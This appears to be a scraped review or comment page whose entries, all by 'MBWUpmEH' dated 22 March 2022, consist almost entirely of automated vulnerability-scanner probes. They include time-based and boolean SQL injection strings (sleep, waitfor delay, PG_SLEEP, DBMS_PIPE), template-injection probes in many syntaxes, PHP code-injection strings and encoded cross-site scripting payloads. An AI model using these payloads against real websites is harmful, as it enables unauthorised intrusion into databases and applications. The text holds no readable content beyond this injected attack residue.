MBWUpmEH

22 March 2022

5
Mr.

1

MBWUpmEH

22 March 2022

4
-1 OR 2+156-156-1=0+0+0+1 --

MBWUpmEH

22 March 2022

4

${@print(md5(31337))}\

MBWUpmEH

22 March 2022

4
-1 OR 2+554-554-1=0+0+0+1

MBWUpmEH

22 March 2022

5
acx{{98991*97996}}xca

1

MBWUpmEH

22 March 2022

4

'.print(md5(31337)).'

MBWUpmEH

22 March 2022

4
-1' OR 2+681-681-1=0+0+0+1 --

MBWUpmEH

22 March 2022

4

MBWUpmEH

22 March 2022

5
acx{{98991*97996}}xca

1

MBWUpmEH

22 March 2022

4
-1' OR 2+153-153-1=0+0+0+1 or 'oZEuBswM'='

MBWUpmEH

22 March 2022

4
-1" OR 2+169-169-1=0+0+0+1 --

MBWUpmEH

22 March 2022

5
acx{98991*97996}xca

1

MBWUpmEH

22 March 2022

4
if(now()=sysdate(),sleep(15),0)

MBWUpmEH

22 March 2022

5
acx${98991*97996}xca

1

MBWUpmEH

22 March 2022

4
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

MBWUpmEH

22 March 2022

5
acx#{98991*97996}xca

1

MBWUpmEH

22 March 2022

4
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

MBWUpmEH

22 March 2022

5
acx{#98991*97996}xca

1

MBWUpmEH

22 March 2022

4
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

MBWUpmEH

22 March 2022

5
acx{@98991*97996}xca

1

MBWUpmEH

22 March 2022

4
-1; waitfor delay '0:0:15' --

MBWUpmEH

22 March 2022

5
acx{{=98991*97996}}xca

1

MBWUpmEH

22 March 2022

4
-1); waitfor delay '0:0:15' --

MBWUpmEH

22 March 2022

4
-1)); waitfor delay '0:0:15' --

MBWUpmEH

22 March 2022

5
acx@(98991*97996)xca

1

MBWUpmEH

22 March 2022

4
1 waitfor delay '0:0:15' --

MBWUpmEH

22 March 2022

5
acx<%=98991*97996%>xca

1

MBWUpmEH

22 March 2022

5
acx#set($x=98991*97996)${x}xca

1

MBWUpmEH

22 March 2022

4
iqgZDUou'; waitfor delay '0:0:15' --

MBWUpmEH

22 March 2022

5
acx{{"abc"|title}}xca

1

MBWUpmEH

22 March 2022

4
vnd7Gdcv'); waitfor delay '0:0:15' --

MBWUpmEH

22 March 2022

4
NtxWXdPz')); waitfor delay '0:0:15' --

MBWUpmEH

22 March 2022

5
print("acx" . 98991*97996 . "xca");

1

MBWUpmEH

22 March 2022

4
-5 OR 939=(SELECT 939 FROM PG_SLEEP(15))--

MBWUpmEH

22 March 2022

5
98991*97996*98991*97996

1

MBWUpmEH

22 March 2022

4
-5) OR 670=(SELECT 670 FROM PG_SLEEP(15))--

MBWUpmEH

22 March 2022

4
-1)) OR 202=(SELECT 202 FROM PG_SLEEP(15))--

MBWUpmEH

22 March 2022

5
acx{@math key=98991 method="multiply" operand=97996/}xca

1

MBWUpmEH

22 March 2022

4
xc7XREJf' OR 115=(SELECT 115 FROM PG_SLEEP(15))--

MBWUpmEH

22 March 2022

5
acx{{{this}}}xca

1

MBWUpmEH

22 March 2022

4
MXZ3ZBbY') OR 717=(SELECT 717 FROM PG_SLEEP(15))--

MBWUpmEH

22 March 2022

5
#{98991*97996*98991*97996}

1

MBWUpmEH

22 March 2022

4
dejLw2jM')) OR 476=(SELECT 476 FROM PG_SLEEP(15))--

MBWUpmEH

22 March 2022

4
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

MBWUpmEH

22 March 2022

5
acx#{xca}=123

1

MBWUpmEH

22 March 2022

4
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

MBWUpmEH

22 March 2022

4
1'"

MBWUpmEH

22 March 2022

5
acx{{'abcd'.toUpperCase()}}xca

1

MBWUpmEH

22 March 2022

4
1����%2527%2522

MBWUpmEH

22 March 2022

4
@@K5sIa

MBWUpmEH

22 March 2022

5
AAABBBCCC{{define "bla"}}bla{{end}}{{define "acx"}}xyz{{end}}{{template "acx"}}CCCBBBAAA

1

MBWUpmEH

22 March 2022

4

1

MBWUpmEH

22 March 2022

4

1

MBWUpmEH

22 March 2022

4

1Lvnm5PM

MBWUpmEH

22 March 2022

5
acx{{98991*97996}}xca

1

MBWUpmEH

22 March 2022

4

-1 OR 2+140-140-1=0+0+0+1 --

MBWUpmEH

22 March 2022

4

-1 OR 2+214-214-1=0+0+0+1

MBWUpmEH

22 March 2022

5
acx[[${98991*97996}]]xca

1

MBWUpmEH

22 March 2022

4

-1' OR 2+702-702-1=0+0+0+1 --

MBWUpmEH

22 March 2022

5
acx__${98991*97996}__::.x

1

MBWUpmEH

22 March 2022

4

-1' OR 2+874-874-1=0+0+0+1 or 'EWpblHUg'='

MBWUpmEH

22 March 2022

5
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")

1

MBWUpmEH

22 March 2022

4

-1" OR 2+103-103-1=0+0+0+1 --

MBWUpmEH

22 March 2022

4

if(now()=sysdate(),sleep(15),0)

MBWUpmEH

22 March 2022

4

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

MBWUpmEH

22 March 2022

4

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

MBWUpmEH

22 March 2022

5
Mr.%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%38%69%52%54%28%39%32%36%37%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

1

MBWUpmEH

22 March 2022

4

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

MBWUpmEH

22 March 2022

4

-1; waitfor delay '0:0:15' --

MBWUpmEH

22 March 2022

4

-1); waitfor delay '0:0:15' --

MBWUpmEH

22 March 2022

4
19829397

MBWUpmEH

22 March 2022

4

-1)); waitfor delay '0:0:15' --

MBWUpmEH

22 March 2022

4
acu4141%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca4141

MBWUpmEH

22 March 2022

4

1 waitfor delay '0:0:15' --

MBWUpmEH

22 March 2022

4

AvXTZtYQ'; waitfor delay '0:0:15' --

MBWUpmEH

22 March 2022

4
acux8950%C0%BEz1%C0%BCz2a%90bcxuca8950

MBWUpmEH

22 March 2022

4

9Ri42qEE'); waitfor delay '0:0:15' --

MBWUpmEH

22 March 2022

4
<%={{={@{#{${acx}}%>

MBWUpmEH

22 March 2022

5
%4D%72%2E%3C%53%63%52%69%50%74%20%3E%38%69%52%54%289415%29%3C%2F%73%43%72%69%70%54%3E

1

MBWUpmEH

22 March 2022

4

1YL128DV')); waitfor delay '0:0:15' --

MBWUpmEH

22 March 2022

5
Mr.\u003CScRiPt\8iRT(9082)\u003C/sCripT\u003E

1

MBWUpmEH

22 March 2022

4
1

MBWUpmEH

22 March 2022

4

-5 OR 831=(SELECT 831 FROM PG_SLEEP(15))--

MBWUpmEH

22 March 2022

5
Mr.&lt;ScRiPt&gt;8iRT(9879)&lt;/sCripT&gt;

1

MBWUpmEH

22 March 2022

4

-5) OR 202=(SELECT 202 FROM PG_SLEEP(15))--

MBWUpmEH

22 March 2022

4
acx{{98991*97996}}xca

MBWUpmEH

22 March 2022

4

-1)) OR 793=(SELECT 793 FROM PG_SLEEP(15))--

MBWUpmEH

22 March 2022

4
acx{{98991*97996}}xca

MBWUpmEH

22 March 2022

4
acx{98991*97996}xca

MBWUpmEH

22 March 2022

4

oTSzpGra' OR 397=(SELECT 397 FROM PG_SLEEP(15))--

MBWUpmEH

22 March 2022

4
acx${98991*97996}xca

MBWUpmEH

22 March 2022

5
Mr.}body{acu:Expre/**/SSion(8iRT(9301))}

1

MBWUpmEH

22 March 2022

4
acx#{98991*97996}xca

MBWUpmEH

22 March 2022

4

TXJ2UtVz') OR 407=(SELECT 407 FROM PG_SLEEP(15))--

MBWUpmEH

22 March 2022

4

Bo8x75Ka')) OR 772=(SELECT 772 FROM PG_SLEEP(15))--

MBWUpmEH

22 March 2022

4
acx{#98991*97996}xca

MBWUpmEH

22 March 2022

4
acx{@98991*97996}xca

MBWUpmEH

22 March 2022

4

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

MBWUpmEH

22 March 2022